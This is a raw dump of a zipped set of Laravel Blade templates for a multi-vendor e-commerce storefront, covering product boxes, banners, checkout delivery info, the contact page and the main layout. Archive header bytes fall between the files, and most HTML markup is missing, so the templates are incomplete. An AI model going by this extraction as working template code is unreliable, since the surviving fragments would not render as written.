    @endif @php $homeBanner1Images = get_setting('home_banner1_images', null, $lang); @endphp @if ($homeBanner1Images != null)
    @php $banner_1_imags = json_decode($homeBanner1Images); $data_md = count($banner_1_imags) >= 2 ? 2 : 1; $home_banner1_links = get_setting('home_banner1_links', null, $lang); @endphp
    @endif @if (addon_is_activated('preorder')) @php $homepreorder_banner_1Images = get_setting('home_preorder_banner_1_images', null, $lang); @endphp @if ($homepreorder_banner_1Images != null)
    @php $banner_2_imags = json_decode($homepreorder_banner_1Images); $data_md = count($banner_2_imags) >= 2 ? 2 : 1; $home_preorder_banner_1_links = get_setting('home_preorder_banner_1_links', null, $lang); @endphp
    @endif @endif @php $homeBanner2Images = get_setting('home_banner2_images', null, $lang); @endphp @if ($homeBanner2Images != null)
    @php $banner_2_imags = json_decode($homeBanner2Images); $data_md = count($banner_2_imags) >= 2 ? 2 : 1; $home_banner2_links = get_setting('home_banner2_links', null, $lang); @endphp
    @endif
    @php $homeBanner3Images = get_setting('home_banner3_images', null, $lang); @endphp @if ($homeBanner3Images != null)
    @php $banner_3_imags = json_decode($homeBanner3Images); $data_md = count($banner_3_imags) >= 2 ? 2 : 1; $home_banner3_links = get_setting('home_banner3_links', null, $lang); @endphp
    @endif @if (addon_is_activated('auction'))
    @endif @if (get_setting('coupon_system') == 1)
    {{ translate(get_setting('cupon_title')) }}
    {{ translate(get_setting('cupon_subtitle')) }}
    {{ translate('View All Coupons') }}
    @endif
    @if (addon_is_activated('preorder')) @include('preorder.frontend.home_page.newest_preorder') @endif @if (get_setting('classified_product') == 1) @php $classified_products = get_home_page_classified_products(6); @endphp @if (count($classified_products) > 0)

    {{ translate('Classified Ads') }}

    @php $classifiedBannerImage = get_setting('classified_banner_image', null, $lang); $classifiedBannerImageSmall = get_setting('classified_banner_image_small', null, $lang); @endphp @if ($classifiedBannerImage != null || $classifiedBannerImageSmall != null)
    {{ env('APP_NAME') }} promo
    {{ env('APP_NAME') }} promo
    @endif
    @foreach ($classified_products as $key => $classified_product)

    {{ $classified_product->getTranslation('name') }}

    {{ $classified_product->user ? $classified_product->user->name : '' }}
    {{ single_price($classified_product->unit_price) }}
    @if ($classified_product->conditon == 'new') {{ translate('New') }} @elseif($classified_product->conditon == 'used') {{ translate('Used') }} @endif
    @endforeach
    @endif @endif @if (get_setting('vendor_system_activation') == 1) @php $best_selers = get_best_sellers(10); @endphp @if (count($best_selers) > 0)

    {{ translate('Top Sellers') }}

    @endif @endif @if (get_setting('top_brands') != null)

    {{ translate('Top Brands') }}

    @php $top_brands = json_decode(get_setting('top_brands')); $brands = get_brands($top_brands); @endphp @foreach ($brands as $brand) @endforeach
    @endif @endsection @section('script') @endsectionPK�N]��w�> > >views/frontend/classic/partials/best_sellers_section.blade.phpnu�[���@if (get_setting('vendor_system_activation') == 1)

    {{ translate('Best Sellers')}}

    {{ translate('View All Sellers') }}
    @endif PK�N] ���yy>views/frontend/classic/partials/best_selling_section.blade.phpnu�[���@php $best_selling_products = get_best_selling_products(20); @endphp @if (get_setting('best_selling') == 1 && count($best_selling_products) > 0)

    {{ translate('Best Selling') }}

    @endifPK�N]���r7views/frontend/classic/partials/category_menu.blade.phpnu�[���
      @foreach (get_level_zero_categories()->take(10) as $key => $category) @php $category_name = $category->getTranslation('name'); @endphp
    • {{ $category_name }} {{ $category_name }}
    • @endforeach
    PK�N]���QQCviews/frontend/classic/partials/featured_products_section.blade.phpnu�[���@if (count(get_featured_products()) > 0)

    {{ translate('Featured Products') }}

    @endifPK�N]g��O. . Aviews/frontend/classic/partials/home_categories_section.blade.phpnu�[���@if (get_setting('home_categories') != null) @php $home_categories = json_decode(get_setting('home_categories')); $categories = get_category($home_categories); @endphp @foreach ($categories as $category_key => $category) @php $category_name = $category->getTranslation('name'); @endphp
    @endforeach @endifPK�N]��iȝ�Aviews/frontend/classic/partials/last_view_product_box_1.blade.phpnu�[���@php $cart_added = []; @endphp
    @php $product_url = route('product', $product->slug); if ($product->auction_product == 1) { $product_url = route('auction-product', $product->slug); } @endphp {{ $product->getTranslation('name') }} {{ $product->getTranslation('name') }} @if (discount_in_percentage($product) > 0) -{{ discount_in_percentage($product) }}% @endif @if ($product->wholesale_product) {{ translate('Wholesale') }} @endif @if ($product->auction_product == 0) @endif @if ( $product->auction_product == 1 && $product->auction_start_date <= strtotime('now') && $product->auction_end_date >= strtotime('now')) @php $carts = get_user_cart(); if (count($carts) > 0) { $cart_added = $carts->pluck('product_id')->toArray(); } $highest_bid = $product->bids->max('amount'); $min_bid_amount = $highest_bid != null ? $highest_bid + 1 : $product->starting_bid; $gst_rate = gst_applicable_product_rate($product->id); @endphp {{ translate('Place Bid') }} @endif

    {{ $product->getTranslation('name') }}

    @if ($product->auction_product == 0) @if (home_base_price($product) != home_discounted_base_price($product))
    {{ home_base_price($product) }}
    @endif
    {{ home_discounted_base_price($product) }}
    @endif @if ($product->auction_product == 1)
    {{ single_price($product->starting_bid) }}
    @endif
    PK�N]��*��Aviews/frontend/classic/partials/newest_products_section.blade.phpnu�[���@if (count($newest_products) > 0)

    {{ translate('New Products') }}

    @endifPK�N]��^^Cviews/frontend/classic/partials/preorder_products_section.blade.phpnu�[���@if (count(get_featured_products()) > 0) @php $lang = get_system_language()->code; $homeBanner1Images = get_setting('featuredPreorder_images', null, $lang); $xxl_items = 6; $xl_items = 5; $lg_items = 4; $md_items = 3; if($homeBanner1Images != null){ $xxl_items = 5; $xl_items = 3.5; $lg_items = 3; $md_items = 1.5; } @endphp
    @if ($homeBanner1Images != null)
    @php $banner_1_imags = json_decode($homeBanner1Images); $home_banner1_links = get_setting('home_banner1_links', null, $lang); @endphp
    @endif
    @endifPK�N]����0�07views/frontend/classic/partials/product_box_1.blade.phpnu�[���@php $cart_added = []; @endphp
    @php $product_url = route('product', $product->slug); if ($product->auction_product == 1) { $product_url = route('auction-product', $product->slug); } @endphp {{ $product->getTranslation('name') }} {{ $product->getTranslation('name') }} @php $badgeIndex = 0; @endphp @if (discount_in_percentage($product) > 0) -{{ discount_in_percentage($product) }}% @php $badgeIndex++; @endphp @endif @if ($product->wholesale_product) {{ translate('Wholesale') }} @php $badgeIndex++; @endphp @endif @php $customLabels = get_custom_labels($product->custom_label_id); @endphp @if ($customLabels) @foreach ($customLabels as $key => $customLabel) {{ $customLabel->text }} @php $badgeIndex++; @endphp @endforeach @endif @if ($product->auction_product == 0) @php $colors = is_string($product->colors) ? json_decode($product->colors, true) : $product->colors; $attributes = is_string($product->attributes) ? json_decode($product->attributes, true) : $product->attributes; @endphp @if ( (is_array($colors) && count($colors) > 0) || (is_array($attributes) && count($attributes) > 0) ) {{ translate('Select Option') }} @else {{ translate('Add to Cart') }} @endif @endif @if ( $product->auction_product == 1 && $product->auction_start_date <= strtotime('now') && $product->auction_end_date >= strtotime('now')) @php $carts = get_user_cart(); if (count($carts) > 0) { $cart_added = $carts->pluck('product_id')->toArray(); } $highest_bid = $product->bids->max('amount'); $min_bid_amount = $highest_bid != null ? $highest_bid + 1 : $product->starting_bid; $gst_rate = gst_applicable_product_rate($product->id); @endphp {{ translate('Place Bid') }} @endif

    {{ $product->getTranslation('name') }}

    @if ($product->auction_product == 0) @if (home_base_price($product) != home_discounted_base_price($product))
    {{ home_base_price($product) }}
    @endif
    {{ home_discounted_base_price($product) }}
    @endif @if ($product->auction_product == 1)
    {{ single_price($product->starting_bid) }}
    @endif
    PK�N]9>����5views/frontend/classic/partials/todays_deal.blade.phpnu�[���@if (count($todays_deal_products) > 0)
    @php $lang = get_system_language()->code; $todays_deal_banner = get_setting('todays_deal_banner', null, $lang); $todays_deal_banner_small = get_setting('todays_deal_banner_small', null, $lang); @endphp @if ($todays_deal_banner != null || $todays_deal_banner_small != null)
    {{ env('APP_NAME') }} promo
    {{ env('APP_NAME') }} promo
    @endif @php $todays_deal_banner_text_color = get_setting('todays_deal_banner_text_color') == 'light' || get_setting('todays_deal_banner_text_color') == null ? 'text-white' : 'text-dark'; @endphp
    @endif PK�N]�Y�(((views/frontend/contact_us_page.blade.phpnu�[���@php $layout = 'frontend.layouts.app'; if (addon_is_activated('portfolio_system')) { $user = auth()->user(); if ( !$user || $user->verification_status == 0 || optional($user->shop)->verification_status == 0 ) { $layout = 'frontend.layouts.portfolio_app'; } } @endphp @extends($layout) @section('meta_title'){{ $page->meta_title }}@stop @section('meta_description'){{ $page->meta_description }}@stop @section('meta_keywords'){{ $page->tags }}@stop @section('meta') @endsection @section('content')
    @php $lang = str_replace('_', '-', app()->getLocale()); $content = json_decode($page->getTranslation('content', $lang)); @endphp

    {{ $page->getTranslation('title') }}

    {{ $content->description }}

    {{ translate('Address') }}
    {!! str_replace("\n", "
    ", $content->address) !!}
    {{ translate('Phone') }}
    {{ $content->phone }}
    {{ translate('Email Address') }}
    {{ $content->email }}
    @csrf
    @if(get_setting('google_recaptcha') == 1 && get_setting('recaptcha_contact_form') == 1) @if ($errors->has('g-recaptcha-response')) {{ $errors->first('g-recaptcha-response') }} @endif @endif
    @if (env('MAIL_USERNAME') == null && env('MAIL_PASSWORD') == null) {{ translate('Submit') }} @else @endif
    @endsection @section('script') @if(get_setting('google_recaptcha') == 1 && get_setting('recaptcha_contact_form') == 1) @endif @endsection PK�N]�2��� views/frontend/coupons.blade.phpnu�[���@extends('frontend.layouts.app') @section('content')

    {{ translate('All coupons') }}

    @foreach($coupons as $key => $coupon) @if($coupon->user->user_type == 'admin' || ($coupon->user->shop != null && $coupon->user->shop->verification_status))
    @include('frontend.partials.coupon_box',['coupon' => $coupon])
    @endif @endforeach
    @endsection PK�N]7�ݹ�z�z1views/frontend/customer_product_details.blade.phpnu�[���@extends('frontend.layouts.app') @section('meta') @endsection @section('content')
    @include('frontend.product_details.image_gallery')

    {{ $detailedProduct->getTranslation('name') }}

    @if ($detailedProduct->brand != null)
    {{ translate('Brand') }} {{ $detailedProduct->brand->name }}
    @endif
    {{ translate('People are viewing right now')}}
    {{ single_price($detailedProduct->unit_price) }} @if ($detailedProduct->unit != null) /{{ $detailedProduct->getTranslation('unit') }} @endif
    @if ($detailedProduct->pdf != null) {{ translate('Download product specifation') }} @endif
    • Product Condition

      @if ($detailedProduct->conditon == 'new') {{translate('New')}} @else {{translate('Used')}} @endif
    • {{ translate('Sold by') }}

      {{ $detailedProduct->user->name }}
    • {{translate('Location')}}

      {{ $detailedProduct->location }}
    • {{translate('Tags')}}

      @if(!empty($detailedProduct->tags)) @foreach(explode(',', $detailedProduct->tags) as $tag) {{ trim($tag) }} @endforeach @endif
    getTranslation('description'); ?>
    @php $products = get_similiar_classified_products($detailedProduct->category_id, $detailedProduct->id, 10); @endphp

    {{ translate('Other Ads of') }} {{ $detailedProduct->category->getTranslation('name') }}

    @if ($products->count() > 0) {{ translate('View More') }} @endif
    @endsection @section('modal') @include('frontend.partials.image_viewer') @endsection @section('script') @if(get_setting('show_custom_product_visitors')==1) @endif @endsectionPK�N]�]�:�:1views/frontend/customer_product_listing.blade.phpnu�[���@extends('frontend.layouts.app') @if (isset($category_id)) @php $meta_title = get_single_category($category_id)->meta_title; $meta_description = get_single_category($category_id)->meta_description; @endphp @elseif (isset($brand_id)) @php $meta_title = get_single_brand($brand_id)->meta_title; $meta_description = get_single_brand($brand_id)->meta_description; @endphp @else @php $meta_title = get_setting('meta_title'); $meta_description = get_setting('meta_description'); @endphp @endif @section('meta_title'){{ $meta_title }}@stop @section('meta_description'){{ $meta_description }}@stop @section('meta') @endsection @section('content')
    @isset($category_id) @endisset
    @foreach ($customer_products as $key => $product)
    {{  $product->getTranslation('name')  }}
    @if($product->conditon == 'new') {{translate('New')}} @elseif($product->conditon == 'used') {{translate('Used')}} @endif

    {{ $product->getTranslation('name') }}

    {{ single_price($product->unit_price) }}
    @endforeach
    {{ $customer_products->links() }}
    @endsection @section('script') @endsection PK�N]YD&"� � $views/frontend/custom_page.blade.phpnu�[���@extends('frontend.layouts.app') @section('meta_title'){{ $page->meta_title }}@stop @section('meta_description'){{ $page->meta_description }}@stop @section('meta_keywords'){{ $page->tags }}@stop @section('meta') @endsection @section('content')

    {{ $page->getTranslation('title') }}

    @php echo $page->getTranslation('content'); @endphp
    @endsection PK�N]���*views/frontend/deliveryboy_login.blade.phpnu�[���@extends('backend.layouts.layout') @section('content')
    @if(get_setting('system_logo_black') != null) @else @endif

    {{ translate('Welcome Back !')}}

    {{ translate('Login To Your Delivery Boy Account')}}
    @csrf
    @if ($errors->has('email')) {{ $errors->first('email') }} @endif
    @if(get_setting('google_recaptcha') == 1 && get_setting('recaptcha_delivery_boy_login') == 1) @if ($errors->has('g-recaptcha-response')) {{ $errors->first('g-recaptcha-response') }} @endif @endif
    @if (env("DEMO_MODE") == "On")
    deliveryboy@example.com 123456
    @endif
    @endsection @section('script') @if(get_setting('google_recaptcha') == 1 && get_setting('recaptcha_delivery_boy_login') == 1) @endif @endsection PK�N]M�*❇��&views/frontend/delivery_info.blade.phpnu�[���@extends('frontend.layouts.app') @section('content')

    {{ translate('1. My Cart') }}

    {{ translate('2. Shipping info') }}

    {{ translate('3. Delivery info') }}

    {{ translate('4. Payment') }}

    {{ translate('5. Confirmation') }}

    @csrf @php $admin_products = array(); $seller_products = array(); $admin_product_variation = array(); $seller_product_variation = array(); foreach ($carts as $key => $cartItem){ $product = get_single_product($cartItem['product_id']); if($product->added_by == 'admin'){ array_push($admin_products, $cartItem['product_id']); $admin_product_variation[] = $cartItem['variation']; } else{ $product_ids = array(); if(isset($seller_products[$product->user_id])){ $product_ids = $seller_products[$product->user_id]; } array_push($product_ids, $cartItem['product_id']); $seller_products[$product->user_id] = $product_ids; $seller_product_variation[] = $cartItem['variation']; } } $pickup_point_list = array(); if (get_setting('pickup_point') == 1) { $pickup_point_list = get_all_pickup_points(); } @endphp @if (!empty($admin_products))
    {{ get_setting('site_name') }} {{ translate('Inhouse Products') }}
      @php $physical = false; @endphp @foreach ($admin_products as $key => $cartItem) @php $product = get_single_product($cartItem); if ($product->digital == 0) { $physical = true; } @endphp
    • {{  $product->getTranslation('name')  }} {{ $product->getTranslation('name') }}
      @if ($admin_product_variation[$key] != '') {{ translate('Variation') }}: {{ $admin_product_variation[$key] }} @endif
    • @endforeach
    @if ($physical)
    {{ translate('Choose Delivery Type') }}
    @if (get_setting('shipping_type') != 'carrier_wise_shipping')
    @else
    @endif @if ($pickup_point_list)
    @endif
    @if ($pickup_point_list)
    @endif
    @if (get_setting('shipping_type') == 'carrier_wise_shipping')
    @foreach($carrier_list as $carrier_key => $carrier)
    @endforeach
    @endif @endif
    @endif @if (!empty($seller_products)) @foreach ($seller_products as $key => $seller_product)
    {{ get_shop_by_user_id($key)->name }} {{ translate('Products') }}
      @php $physical = false; @endphp @foreach ($seller_product as $key2 => $cartItem) @php $product = get_single_product($cartItem); if ($product->digital == 0) { $physical = true; } @endphp
    • {{  $product->getTranslation('name')  }} {{ $product->getTranslation('name') }}
      @if ($seller_product_variation[$key2] != '') {{ translate('Variation') }}: {{ $seller_product_variation[$key2] }} @endif
    • @endforeach
    @if ($physical)
    {{ translate('Choose Delivery Type') }}
    @if (get_setting('shipping_type') != 'carrier_wise_shipping')
    @else
    @endif @if ($pickup_point_list)
    @endif
    @if ($pickup_point_list)
    @endif
    @if (get_setting('shipping_type') == 'carrier_wise_shipping')
    @foreach($carrier_list as $carrier_key => $carrier)
    @endforeach
    @endif @endif
    @endforeach @endif
    {{ translate('Return to shop')}}
    @endsection @section('script') @endsection PK�N].ψ��0views/frontend/digital_product_details.blade.phpnu�[���@extends('frontend.layouts.app') @section('meta_title'){{ $detailedProduct->meta_title }}@stop @section('meta_description'){{ $detailedProduct->meta_description }}@stop @section('meta_keywords'){{ $detailedProduct->tags }}@stop @section('meta') @endsection @section('content')
    @if($detailedProduct->photos != null) @php $photos = explode(',',$detailedProduct->photos); @endphp
    @endif

    {{ $detailedProduct->getTranslation('name') }}

    @php $total = 0; $total += $detailedProduct->reviews->where('status', 1)->count(); @endphp {{ renderStarRating($detailedProduct->rating) }} ({{ $total }} {{ translate('reviews') }})
    {{ translate('In stock')}}

    @if ($detailedProduct->added_by == 'seller' && get_setting('vendor_system_activation') == 1) @endif
    {{ translate('Sold by') }}
    @if ($detailedProduct->added_by == 'seller' && get_setting('vendor_system_activation') == 1) {{ $detailedProduct->user->shop->name }} @else {{ translate('Inhouse product') }} @endif
    @if (get_setting('conversation_system') == 1)
    @endif @if ($detailedProduct->brand != null)
    {{ $detailedProduct->brand->getTranslation('name') }}
    {{ translate('Brand') }}
    {{ $detailedProduct->brand->name }}
    @endif

    @if(home_price($detailedProduct) != home_discounted_price($detailedProduct))
    {{ translate('Price')}}
    {{ home_discounted_price($detailedProduct) }} {{ home_price($detailedProduct) }} @if($detailedProduct->unit != null) /{{ $detailedProduct->getTranslation('unit') }} @endif @if(discount_in_percentage($detailedProduct) > 0) -{{discount_in_percentage($detailedProduct)}}% @endif @if (addon_is_activated('club_point') && $detailedProduct->earn_point > 0)
    {{ translate('Club Point') }}: {{ $detailedProduct->earn_point }}
    @endif
    @else
    {{ translate('Price') }}
    {{ home_discounted_price($detailedProduct) }} @if ($detailedProduct->unit != null) /{{ $detailedProduct->getTranslation('unit') }} @endif @if (addon_is_activated('club_point') && $detailedProduct->earn_point > 0)
    {{ translate('Club Point') }}: {{ $detailedProduct->earn_point }}
    @endif
    @endif
    @csrf
    {{ translate('Total Price') }}
    @if(Auth::check() && addon_is_activated('affiliate_system') && get_affliate_option_status() && Auth::user()->affiliate_user != null && Auth::user()->affiliate_user->status) @php if(Auth::check()){ if(Auth::user()->referral_code == null){ Auth::user()->referral_code = substr(Auth::user()->id.Str::random(10), 0, 10); Auth::user()->save(); } $referral_code = Auth::user()->referral_code; $referral_code_url = URL::to('/product').'/'.$detailedProduct->slug."?product_referral_code=$referral_code"; } @endphp
    @endif
    @php $refund_sticker = get_setting('refund_sticker'); @endphp @if (addon_is_activated('refund_request')) @endif @if ($detailedProduct->added_by == 'seller')
    {{ translate('Seller Guarantees')}}
    @if ($detailedProduct->user->shop->verification_status == 1) {{ translate('Verified seller')}} @else {{ translate('Non verified seller')}} @endif
    @endif
    {{ translate('Share') }}
    @if ($detailedProduct->added_by == 'seller' && $detailedProduct->user->shop != null)
    @if ($detailedProduct->user->shop->verification_status)
    @endif
    {{ translate('Seller')}}
    @if ($detailedProduct->added_by == 'seller' && get_setting('vendor_system_activation') == 1) @endif
    @if ($total > 0) {{ renderStarRating($detailedProduct->user->shop->rating) }} @else {{ renderStarRating(0) }} @endif
    ({{ $total }} {{ translate('customer reviews') }})
    @endif
    {{ translate('Top Selling Products') }}
      @foreach (get_best_selling_products(6, $detailedProduct->user_id) as $key => $top_product)
    • {{ $top_product->getTranslation('name') }}

      {{ home_discounted_base_price($top_product) }} @if(home_price($top_product) != home_discounted_price($top_product)) {{ home_price($top_product) }} @endif
    • @endforeach
    getTranslation('description'); ?>
    @if ($detailedProduct->video_provider == 'youtube' && isset(explode('=', $detailedProduct->video_link)[1])) @elseif ($detailedProduct->video_provider == 'dailymotion' && isset(explode('video/', $detailedProduct->video_link)[1])) @elseif ($detailedProduct->video_provider == 'vimeo' && isset(explode('vimeo.com/', $detailedProduct->video_link)[1])) @endif
      @foreach ($detailedProduct->reviews->where('status', 1) as $key => $review) @if ($review->user != null)
    • user->avatar_original != null) data-src="{{ uploaded_asset($review->user->avatar_original) }}" @else data-src="{{ static_asset('assets/img/placeholder.jpg') }}" @endif>

      {{ $review->user->name }}

      @for ($i = 0; $i < $review->rating; $i++) @endfor @for ($i = 0; $i < 5 - $review->rating; $i++) @endfor
      {{ date('d-m-Y', strtotime($review->created_at)) }}

      {{ $review->comment }}

    • @endif @endforeach
    @if (count($detailedProduct->reviews->where('status', 1)) <= 0)
    {{ translate('There have been no reviews for this product yet.') }}
    @endif

    {{ translate('Related products') }}

    @if(get_setting('product_query_activation') == 1)

    {{ translate(' Product Queries ') }} ({{ $total_query }})

    @guest

    {{ translate('Login') }} or {{ translate('Register ') }}{{ translate(' to submit your questions to seller') }}

    @endguest @auth
    @if ($errors->any())
      @foreach ($errors->all() as $error)
    • {{ $error }}
    • @endforeach
    @endif
    @csrf
    @php $own_product_queries = Auth::user()->product_queries->where('product_id',$detailedProduct->id); @endphp @if ($own_product_queries->count() > 0)

    {{ translate('My Questions') }}

    @foreach ($own_product_queries as $product_query)
    {{ strip_tags($product_query->question) }}
    {{ $product_query->user->name }}
    {{ strip_tags($product_query->reply ? $product_query->reply : translate('Seller did not respond yet')) }}
    {{ $product_query->product->user->name }}
    @endforeach
    @endif @endauth
    @include('frontend.partials.product_query_pagination')
    @endif
    @endsection @section('modal') @endsection @section('script') @endsection PK�N]'Z ��*views/frontend/featured_products.blade.phpnu�[���@extends('frontend.layouts.app') @section('content')

    {{ translate('Featured Products') }}

    @foreach ($featured_products as $key => $product)
    @include('frontend.'.get_setting('homepage_select').'.partials.product_box_1',['product' => $product])
    @endforeach
    @endsection PK�N]�^&��7views/frontend/flash_deal/all_flash_deal_list.blade.phpnu�[���@extends('frontend.layouts.app') @section('content')

    {{ translate('Flash Deals')}}

    @if (get_setting('flash_deal_banner') != null || get_setting('flash_deal_banner_small') != null)
    {{ env('APP_NAME') }} promo
    {{ env('APP_NAME') }} promo
    @endif
    @foreach($all_flash_deals as $single) @endforeach
    @endsection @section('script') @endsection PK�N]5cD�t t +views/frontend/flash_deal_details.blade.phpnu�[���@extends('frontend.layouts.app') @section('content')

    {{ $flash_deal->title }}

    @if($flash_deal->status == 1 && strtotime(date('Y-m-d H:i:s')) <= $flash_deal->end_date)
    @foreach ($flash_deal->flash_deal_products as $key => $flash_deal_product) @php $product = get_single_product($flash_deal_product->product_id); @endphp @if ($product != null && $product->published != 0) @php $product_url = route('product', $product->slug); if($product->auction_product == 1) { $product_url = route('auction-product', $product->slug); } @endphp
    @include('frontend.'.get_setting('homepage_select').'.partials.product_box_1',['product' => $product])
    @endif @endforeach
    @else

    {{ $flash_deal->title }}

    {{ translate('This offer has been expired.') }}

    @endif
    @endsection PK�N]����CC7views/frontend/google_recaptcha/app_recaptcha.blade.phpnu�[���
    PK�N]'CE<$<$*views/frontend/handle_demo_login.blade.phpnu�[��� @php $rtl = get_session_language()->rtl; @endphp @if ($rtl == 1) @else @endif @yield('meta_title', get_setting('website_name') . ' | ' . get_setting('site_motto')) @php $site_icon = uploaded_asset(get_setting('site_icon')); @endphp @if ($rtl == 1) @endif PK�N]�(�{&{&%views/frontend/inc/demo_nav.blade.phpnu�[���

    {{ translate('Active eCommerce Main Demo') }}

    {{ translate('Grocery Store') }}

    {{ translate('Electronics Shop') }}

    {{ translate('Fashion Store') }}

    {{ translate('Automobile Store') }}

    {{ translate('Furniture Store') }}

    {{ translate('Medical Store') }}

    {{ translate('Sports Store') }}

    {{ translate('Construction Store') }}

    {{ translate('Megamart') }}

    {{ translate('Beauty Store') }}

    {{ translate('Coming Soon') }}

    PK�N]�B��-views/frontend/inc/floating_buttons.blade.phpnu�[��� PK�N]��>&&`&`#views/frontend/inc/footer.blade.phpnu�[��� @if(get_setting('last_viewed_product_activation') == 1 && Auth::check() && auth()->user()->user_type == 'customer')
    @php $lastViewedProducts = getLastViewedProducts(); @endphp @if (count($lastViewedProducts) > 0)

    {{ translate('Last Viewed Products') }}

    @endif
    @endif @if (get_setting('enable_sub_footer_section') == 1)

    {{ get_setting('footer_title', null, $system_language->code) }}

    @php $fullDescription = nl2br(get_setting('footer_description', null, $system_language->code)); @endphp
    @endif @if (get_setting('enable_footer_policy_section') == 1)
    @endif @include('footer.' .get_element_type_by_id(get_setting('footer_element'))) @if (Auth::check() && auth()->user()->user_type == 'customer') @endif PK�N]�Faj(j( views/frontend/inc/nav.blade.phpnu�[��� @php $top_banner_background_color = get_setting('top_banner_background_color', get_setting('base_color')); $top_banner_text_color = get_setting('top_banner_text_color'); $top_banner_image = get_setting('top_banner_image'); $top_banner_image_for_tabs = get_setting('top_banner_image_for_tabs'); $top_banner_image_for_mobile = get_setting('top_banner_image_for_mobile'); $topBanners = \App\Models\TopBanner::where('status', 1)->orderBy('id','desc')->get(); @endphp @if (count($topBanners) > 0 || $top_banner_image != null)
    @if($top_banner_image != null) {{ translate('top_banner') }} {{ translate('top_banner') }} {{ translate('top_banner') }} @endif
    @foreach ($topBanners as $banner) {{ $banner->getTranslation('text') }} @endforeach
    @endif @include('header.' .get_element_type_by_id(get_setting('header_element'))) @section('script') @endsectionPK�N]��xpg�g�*views/frontend/inc/user_side_nav.blade.phpnu�[���
    @php $user = auth()->user(); $user_avatar = null; $carts = []; if ($user && $user->avatar_original != null) { $user_avatar = uploaded_asset($user->avatar_original); } @endphp
    @if ($user->avatar_original != null) @else @endif

    {{ $user->name }}

    @if ($user->phone != null)
    {{ $user->phone }}
    @else
    {{ $user->email }}
    @endif
    {{ translate('Sign Out') }}
    PK�N]��>���)views/frontend/inhouse_products.blade.phpnu�[���@extends('frontend.layouts.app') @section('content')

    {{ translate('Inhouse products') }}

    @foreach ($products as $key => $product)
    @include('frontend.'.get_setting('homepage_select').'.partials.product_box_1',['product' => $product])
    @endforeach
    {{ $products->appends(request()->input())->links() }}
    @endsection PK�N]�%!�� � ,views/frontend/instamojo/instamojo.blade.phpnu�[��� {{translate('Instamojo Payment Gateway Integrate')}}

    {{translate('Confirm your Information For Security Reason')}}

    @if ($errors->any())
    {{translate('Opps!')}}' {{translate('Something went wrong')}}
      @foreach ($errors->all() as $error)
    • {{ $error }}
    • @endforeach
    @endif
    {{ csrf_field() }}
    {{translate('Name')}}
    {{translate('Mobile Number')}}
    {{translate('Email Id')}}
    {{translate('Amount')}}
    PK�N]Ѭ�@}}$views/frontend/layouts/app.blade.phpnu�[��� @php $rtl = get_session_language()->rtl; @endphp @if ($rtl == 1) @else @endif @yield('meta_title', get_setting('website_name') . ' | ' . get_setting('site_motto')) @yield('meta') @if (!isset($detailedProduct) && !isset($customer_product) && !isset($shop) && !isset($page) && !isset($blog)) @php $meta_image = uploaded_asset(get_setting('meta_image')); @endphp @endif @php $site_icon = uploaded_asset(get_setting('site_icon')); @endphp @if ($rtl == 1) @endif @if(get_setting('homepage_select') == 'thecore') @endif @if (get_setting('google_analytics') == 1) @endif @if (get_setting('facebook_pixel') == 1) @endif @php echo get_setting('header_script'); echo get_setting('header_gtm_script'); @endphp
    @php $user = auth()->user(); $user_avatar = null; $carts = []; if ($user && $user->avatar_original != null) { $user_avatar = uploaded_asset($user->avatar_original); } $system_language = get_system_language(); @endphp @include('frontend.inc.nav') @yield('content') @include('frontend.inc.footer')
    @if(get_setting('use_floating_buttons') == 1) @include('frontend.inc.floating_buttons') @endif
    @if (env("DEMO_MODE") == "On") @include('frontend.inc.demo_nav') @endif @php $alert_location = get_setting('custom_alert_location'); $order = in_array($alert_location, ['top-left', 'top-right']) ? 'asc' : 'desc'; $custom_alerts = App\Models\CustomAlert::where('status', 1)->orderBy('id', $order)->get(); $hasUnreviewed = false; use App\Models\Order; use App\Models\OrderDetail; if(auth()->user()){ $userOrderIds = Order::where('user_id', auth()->user()->id)->pluck('id'); $hasUnreviewed = OrderDetail::whereIn('order_id', $userOrderIds)->where('delivery_status', 'delivered')->where('reviewed', 0)->exists(); } @endphp
    @foreach ($custom_alerts as $custom_alert) @if($custom_alert->id == 1) @elseif($custom_alert->id == 200) @php $showalert = true; if(auth()->user()){ $showalert = $hasUnreviewed; }else{ $showalert= false; } @endphp @if(addon_is_activated('club_point') && get_setting('set_point_for_product_review') != 0 && $showalert) @endif @elseif($custom_alert->id == 300) @php if(auth()->check()){ $showcustomalert = true; }else{ $showcustomalert= false; } @endphp @if(addon_is_activated('otp_system') && $showcustomalert && auth()->user()->otp_alert_seen == 0) @endif @else
    auto_hide }} style="box-shadow: 0px 6px 10px rgba(0, 0, 0, 0.24);">
    @endif @endforeach
    @php $dynamic_popups = App\Models\DynamicPopup::where('status', 1)->orderBy('id', 'asc')->get(); $popup_count = 0; $hideWrapper = false; if(count($dynamic_popups) == 1 && ($dynamic_popups[0]->id == 100 && $hasUnreviewed == false)) { $hideWrapper = true; } @endphp @if(count($dynamic_popups) > 0) @endif @include('frontend.partials.modal') @include('frontend.partials.account_delete_modal')
    @yield('modal')
    {{-- WhatsaApp Chat --}} @if (get_setting('whatsapp_chat') == 1) @endif @if(addon_is_activated('otp_system')) @endif @if (env("DEMO_MODE") == "On") @endif @if (get_setting('header_element') == 5 || get_setting('header_element') == 6 || get_setting('header_element') == 10) @endif @if(get_setting('show_custom_product_sale_alert')==1) @endif @yield('script') @php echo get_setting('footer_script'); echo get_setting('footer_gtm_script'); @endphp PK�N].�;WLL+views/frontend/layouts/user_panel.blade.phpnu�[���@extends('frontend.layouts.app') @section('content')
    @include('frontend.inc.user_side_nav')
    @yield('panel_content')
    @endsectionPK�N]a������'views/frontend/megamart/index.blade.phpnu�[���@extends('frontend.layouts.app') @section('content') @php $lang = get_system_language()->code; @endphp @if (count($featured_categories) > 0)
    @endif
    @if (get_setting('home_slider_images', null, $lang) != null) @endif
    @php $flash_deal = get_featured_flash_deal(); $flash_deal_bg = get_setting('flash_deal_bg_color'); $flash_deal_bg_full_width = (get_setting('flash_deal_bg_full_width') == 1) ? true : false; $flash_deal_banner_menu_text = ((get_setting('flash_deal_banner_menu_text') == 'dark') || (get_setting('flash_deal_banner_menu_text') == null)) ? 'text-dark' : 'text-white'; @endphp @if ($flash_deal != null)
    @php $flash_deal_products = get_flash_deal_products($flash_deal->id); @endphp
    @endif @php $todays_deal_section_bg = get_setting('todays_deal_section_bg_color'); @endphp
    @if (addon_is_activated('preorder')) @php $homepreorder_banner_1Images = get_setting('home_preorder_banner_1_images', null, $lang); @endphp @if ($homepreorder_banner_1Images != null)
